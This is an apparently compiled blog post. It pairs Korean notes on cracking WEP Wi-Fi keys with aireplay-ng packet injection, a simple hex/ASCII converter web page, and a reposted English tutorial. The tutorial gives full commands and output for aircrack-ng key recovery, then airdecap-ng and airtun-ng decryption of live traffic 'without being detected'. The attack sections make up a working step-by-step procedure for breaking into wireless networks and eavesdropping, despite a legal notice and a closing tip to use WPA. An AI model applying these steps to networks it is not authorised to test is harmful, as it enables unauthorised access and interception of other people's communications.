暗行御史

필자의 경험상 40 bit의 경우 빠르면 30초 길어야 1분정도의 데이타량(10000)이면 크랙되고
128bit web 키의 경우 3분이면 데이타가 오만정도 되니 web key는 해킹된다.

나름 정리하면..데이터를 빈번히 주고 받는 AP를 모니터링 하면 쉽게 데이터가 모아지는데 AP에
아무도 연결되어 있지 않는 경우가 있다.

이런경우 패킷 인젝션이 더 간절한데 원래 패킷을 모으기 위해 어차피 하는 과정에 있다.
aireplay-ng -1 0 모시기....쭉쭉~
(success 가 뜨면 다행인데 요즘 맥 필터도 늘어서 간혹 안되는 경우도 있다. 그래 봐야 우회하는
방법도 있으니..외국 문서 2~3개만 보면 금방 나온다.)

success가 뜨면 안보이던 데이터가 하나씩 증가한다. 그때 터보 부스터를 달아줘야 한다.

aireplay-ng -3  쭉쭉 모시기...
잠시 기다려야 한다. 사용자의 능력은 아니지만 지멋데로 빨리 뜰때가 있고 길때는 2분정도 기다리면(?) 쫘악~하고 몬 리스트가 쭈루룩 하면서 터보 부스터 단것 처럼 데이터 수집량이 증가한다.
중요 포인트는 기다려야 한다. >,.<

그리고는 수집된 패킷은 aircrack-ng로 크랙하면 일단 끝이다.

라고 생각하면 오산이다.
모의 해커는 그 다음 까지 생각해야 한다. (솔직히 그 다음이 더 중요하다.+0+)

헥사 코드로 나온 모시기가 나온다. 당신은 이 키 값을 어떻게 이용할 것인가?
키를 크랙한 헥사 코드는 복호화 해보자. 모가 나오는가?

윈도우에서 아무리 헥사 키로 AP에 접근해도 키값이 헥사 코드면 접근 되지 않는다.
"그럼 고객에게 키는 크랙했는데 접근 못했습니다."라고 보고서에 작성하는 
우울한 컨설턴트도 있을 것이다.

그럴경우 추천하는 AP 접속 유틸리티(Ralink Configuration Tool)가 있다.
http://www.iptime.co.kr/~iptime/bbs/view.php?id=sw_download&page=24&ffid=&fsid=&dffid=&dfsid=&dftid=&sn1=&divpage=1&dis_comp=&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=1184
단 기종이 ipTIME G054U2 / G054UA일 경우이다.
다른건 테스트 해보지 않았다.

불필요한 삽질은 나로써 대를 끊자 -_ㅡ+

[Notice : 본 내용을 악의적인 사용시, 사용자에게 법적 책임이 있습니다.]

[출처] 기억이 안남..^^;

<html>
<head>
<title>Hex/Ascii Converter</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<script>

var symbols = " !\"#$%&'()*+,-./0123456789:;<=>?@";
var loAZ = "abcdefghijklmnopqrstuvwxyz";
symbols+= loAZ.toUpperCase();
symbols+= "[\\]^_`";
symbols+= loAZ;
symbols+= "{|}~";

function toAscii()
{
 valueStr = document.form1.hex.value;
 valueStr = valueStr.toLowerCase();
    var hex = "0123456789abcdef";
 var text = "";
 var i=0;

 for( i=0; i<valueStr.length; i=i+2 )
 {
  var char1 = valueStr.charAt(i);
  if ( char1 == ':' )
  {
   i++;
   char1 = valueStr.charAt(i);
  }
  var char2 = valueStr.charAt(i+1);
  var num1 = hex.indexOf(char1);
  var num2 = hex.indexOf(char2);
  var value = num1 << 4;
  value = value | num2;

  var valueInt = parseInt(value);
  var symbolIndex = valueInt - 32;
  var ch = '?';
  if ( symbolIndex >= 0 && value <= 126 )
  {
   ch = symbols.charAt(symbolIndex)
  }
  text += ch;
 }

 document.form1.ascii.value = text;
 return false;
}

function toHex()
{
 var valueStr = document.form1.ascii.value;
 var hexChars = "0123456789abcdef";
 var text = "";
 for( i=0; i<valueStr.length; i++ )
 {
  var oneChar = valueStr.charAt(i);
  var asciiValue = symbols.indexOf(oneChar) + 32;
  var index1 = asciiValue % 16;
  var index2 = (asciiValue - index1)/16;
  if ( text != "" ) text += ":";
  text += hexChars.charAt(index2);
  text += hexChars.charAt(index1);
 }
 document.form1.hex.value = text;
 return false;
}

</script>

</head>

<body>

<p><font face="Geneva, Arial, Helvetica, sans-serif"><strong>Hex To ASCII Converter</strong></font></p>
<form name="form1" method="post" action="">
  <table width="78%" border="0" cellpadding="5" cellspacing="5">
    <tr>
      <td width="13%"><font size="-1" face="Geneva, Arial, Helvetica, sans-serif">Hex:
        </font></td>
      <td width="76%"><textarea name="hex" cols="80" rows="3" id="hex">67:6f:64:20:62:6c:65:73:73:20:79:6f:75:21:20:3a:29</textarea></td>
    </tr>
    <tr>
      <td><font size="-1" face="Geneva, Arial, Helvetica, sans-serif">Ascii:</font></td>
      <td><textarea name="ascii" cols="80" rows="3" id="ascii"></textarea></td>
    </tr>
  </table>
  <p>
    <input name="b1" type="submit" id="b13" value="Hex To ASCII" onClick="return toAscii();">
    <input name="b2" type="submit" id="b14" value="ASCII To Hex" onClick="return toHex();">
  </p>
  <p>&nbsp;</p>
</form>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>

[출처] http://www.netexpertise.eu/en/linux/crack-wep-key-and-decrypt-live-traffic.html

Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much… We are going to decrypt traffic in real time as well without even needing to connect to the wireless access point.
 
All steps will be run under root super-user as interfaces state needs to be changed.
 

To Start with

Download and install aircrack-ng. It’s available on most Linux distributions in a package format.
On Debian, run

apt-get install aircrack-ng

 
Aircrack provides tools to capture packets, crack the WEP key, and decrypt live traffic.
 
We’ll run tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card’s network stats that tells us it’s been detected.

root@crack_WEP:~# ifconfig
lo        Interface doesn't support scanning.

wlan0     Link encap:Ethernet  HWaddr 00:1a:70:6b:37:4e
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:63 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3742 (3.7 KB)  TX bytes:10773 (10.7 KB)

 

Capture packets

The interface needs to be switched to monitor mode.

root@crack_WEP:~# airmon-ng
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]

 
Airmon has detected interface wlan0. It could be a different name of course such as ath0 for instance.

root@crack_WEP:~# airmon-ng stop wlan0
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]
				(monitor mode disabled)

root@crack_WEP:~# airmon-ng start wlan0
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]
				(monitor mode enabled on mon0)

 
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:

root@crack_WEP:~# iwconfig
wlan0     IEEE 802.11bg  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

 
We can now scan for available networks

root@crack_WEP:~# airodump-ng mon0
 CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  197        4        0    0   1  11  WEP  WEP         private
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 
Scan results show we've got an access point emitting on channel 1 with WEP encryption and which has mac address 00:A0:C5:FF:84:72.
The target now defined, we need to capture air packets.

root@crack_WEP:~# airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0

 CH  1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  205  10     6058    24496    0   1  54  WEP  WEP         private
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795

 
Packets are captured in .cap files with the temp suffix.
Cracking techniques getting more efficient, there are good chances to crack a key with no more than 40000 packets with recent algorithms. Capturing time varies with the amount of traffic on the air link.
 

Crack the WEP key

It's now time to crack the WEP key:

root@crack_WEP:~# aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap 

                                         Aircrack-ng 1.0 rc1

                         [00:00:22] Tested 240228 keys (got 41742 IVs)

   KB    depth   byte(vote)
    0    0/  1   B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640)
    1    0/  1   19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664)
    2    0/  1   31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176)
    3    0/  1   8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128)
    4    0/  1   B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616)
    5    0/  1   61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408)
    6    0/  1   DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152)
    7    0/  1   4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640)
    8    0/  1   FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104)
    9    0/  1   0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896)
   10    0/  1   E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896)
   11    2/  1   FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616)
   12    0/  4   91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788) 

             KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ]
	Decrypted correctly: 100%

 
That’s right, the key was cracked in 22 seconds!
 

Decrypt the traffic

It is possible to capture the traffic in .cap files as above, decrypt it in a second file before sending it to the tcpdump command for instance:

root@crack_WEP:~# airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap
Total number of packets read         22072
Total number of WEP data packets      6245
Total number of WPA data packets         0
Number of plaintext data packets         3
Number of decrypted WEP  packets      6245
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets         0

root@crack_WEP:~# tcpdump -r temp-01-dec.cap -i wlan

 
But it is also possible to decrypt live traffic in real time sending it to a virtual interface at0 on which we can listen as with any real interface. Airtun-ng provided in Aircrack package has the ability to do so.

root@crack_WEP:~# airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0
created tap interface at0
WEP encryption specified. Sending and receiving frames through mon0.
FromDS bit set in all frames.

 
From another shell:

crack_WEP:~# tcpdump -i at0

 

Conclusion

It is indeed very easy to crack a WEP key and listen to the traffic without associating to the access point hence without being detected. Pay attention to use at least WPA with non-dictionnary based passwords.